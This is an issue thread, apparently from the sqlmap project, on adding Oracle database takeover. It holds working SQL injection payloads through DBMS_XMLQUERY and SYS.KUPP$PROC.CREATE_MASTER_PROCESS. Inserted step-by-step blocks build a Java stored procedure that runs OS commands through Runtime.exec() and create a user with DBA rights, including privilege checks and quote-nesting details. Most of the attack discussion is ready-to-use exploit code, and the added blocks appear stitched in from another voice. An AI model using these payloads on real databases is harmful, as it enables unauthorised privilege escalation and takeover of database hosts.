Open bdamele opened 12 years ago
We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3
@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and bruteforce your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.
Maybe this helps: In Oracle there are two functions granted to PUBLIC by default: dbms_xmlquery.newcontext() and dbms_xmlquery.getxml()
These two functions allow execution of anonymous PL/SQL blocks within an SQL statement. Extremely helpful when injecting in Oracle databases. Examples:
select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual
select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual
With this technique it would be possible to create a Java package with Runtime.exec() to take over the database host (the user needs the rights (grants) for this operation, but this can be checked via the Oracle system tables).
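The chain the comment above describes (an anonymous PL/SQL block smuggled through DBMS_XMLQUERY.NEWCONTEXT, then a Java stored procedure wrapping Runtime.exec()), as an added SQL example that is not part of the original issue or of sqlmap. The schema name HYPO_SCHEMA, the object names OsCmd and run_os_cmd, and the command `id` are assumptions; the q'[...]' / q'#...#' quoting is equivalent to the doubled single quotes used in the comment and needs Oracle 10g or later.

```sql
-- Added example, not from the issue or sqlmap. Assumed names: HYPO_SCHEMA (the schema the
-- injection runs as), OsCmd (Java class), run_os_cmd (PL/SQL wrapper).

-- 1. Check what the current session may do before trying anything.
--    CREATE PROCEDURE covers both the Java source and the wrapper function;
--    JAVA_ADMIN (or DBA) is needed to grant the Java runtime permissions in step 2.
SELECT privilege FROM session_privs
 WHERE privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE');
SELECT role FROM session_roles
 WHERE role IN ('JAVA_ADMIN', 'DBA');
--    Java permissions the schema already holds (empty result: Runtime.exec() will be denied).
SELECT type_name, name, action, enabled
  FROM user_java_policy
 WHERE kind = 'GRANT'
   AND type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission');

-- 2. Grant the Java permissions Runtime.exec() needs (fails without JAVA_ADMIN).
BEGIN
  DBMS_JAVA.GRANT_PERMISSION('HYPO_SCHEMA', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
  DBMS_JAVA.GRANT_PERMISSION('HYPO_SCHEMA', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
  DBMS_JAVA.GRANT_PERMISSION('HYPO_SCHEMA', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
END;
/

-- 3. Create the Java source and its PL/SQL wrapper from inside a single SELECT,
--    which is what makes the DDL reachable from an injection point.
--    Outer literal: q'[...]'; inner DDL literals: q'#...#' (the Java code contains
--    neither "#'" nor "]'", so no quote doubling is needed).
SELECT dbms_xmlquery.newcontext(q'[
  DECLARE
    PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    EXECUTE IMMEDIATE q'#
      CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "OsCmd" AS
      import java.io.*;
      public class OsCmd {
        public static String run(String cmd) {
          StringBuffer out = new StringBuffer();
          try {
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = r.readLine()) != null) { out.append(line).append("\n"); }
            r.close();
          } catch (Exception e) {
            return e.toString();
          }
          return out.toString();
        }
      }#';
    EXECUTE IMMEDIATE q'#
      CREATE OR REPLACE FUNCTION run_os_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
      AS LANGUAGE JAVA NAME 'OsCmd.run(java.lang.String) return java.lang.String'#';
    COMMIT;
  END;]') FROM dual;

-- 4. Run a command; stdout comes back as the function result.
SELECT run_os_cmd('id') FROM dual;
```

If the target is older than 10g, the alternative quoting is unavailable and every single quote inside the block must be doubled once per nesting level, exactly as in the comment's synonym example. Step 1 is worth running first: the Java source and wrapper compile fine without the policy grants, and the failure (a java.security.AccessControlException surfacing as an ORA-29532 on the call in step 4) only appears when run_os_cmd is executed.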
@infodox where's your pull request? :)
Bump
There seem to be a few methods to execute OS commands, and one of them is through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.
For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--
I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.
I came across this whitepaper that goes into a lot more detail, including privilege escalation. I hope it might be helpful. https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf
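The SYS.KUPP$PROC.CREATE_MASTER_PROCESS route from the comment above, as an added SQL example that is not from the issue or from sqlmap. It checks that the session can execute the package at all, builds the nested-quote payload one layer at a time so the quote doubling can be followed, and verifies the outcome. HYPO_USER and its password are assumptions; that the function executes its argument with its definer's (SYS) privileges is inferred from the result the commenter reports, not confirmed here.

```sql
-- Added example, not from the issue or sqlmap. HYPO_USER / Hyp0Pass1 are assumed values.

-- 1. Can this session call the entry point? EXECUTE on SYS.KUPP$PROC must be granted
--    to PUBLIC, to the current user, or to one of its roles.
SELECT grantee, privilege
  FROM all_tab_privs
 WHERE table_schema = 'SYS'
   AND table_name   = 'KUPP$PROC'
   AND privilege    = 'EXECUTE';

-- 2. The PL/SQL we want CREATE_MASTER_PROCESS to run, written plainly first.
--    EXECUTE IMMEDIATE takes the DDL without a trailing semicolon; the autonomous
--    transaction keeps the DDL's implicit commit out of the caller's transaction.
DECLARE
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'CREATE USER hypo_user IDENTIFIED BY Hyp0Pass1';
  EXECUTE IMMEDIATE 'GRANT dba TO hypo_user';
END;
/

-- 3. The same block as the string argument. The comment's payload wraps the block in
--    one more EXECUTE IMMEDIATE, so the quotes are doubled once per nesting level:
--    level 0 = the argument literal ('), level 1 = the block (''), level 2 = the DDL ('''').
SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS(
  'EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''CREATE USER hypo_user IDENTIFIED BY Hyp0Pass1''''; EXECUTE IMMEDIATE ''''GRANT dba TO hypo_user''''; END;'';'
) FROM dual;

-- 4. Verify. all_users is readable by everyone; dba_role_privs needs the new DBA role,
--    so run the second query after connecting as HYPO_USER.
SELECT username FROM all_users WHERE username = 'HYPO_USER';
SELECT granted_role FROM dba_role_privs WHERE grantee = 'HYPO_USER';
```

In the AND-based injection shown in the comment, the call from step 3 is placed in a subquery and compared with IS NOT NULL only so that the page renders its "true" branch once the function has returned; the privilege escalation itself happens as a side effect of evaluating the WHERE clause, which is why a single request is enough.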
Add support to take over the file system when the back-end DBMS is Oracle.
References: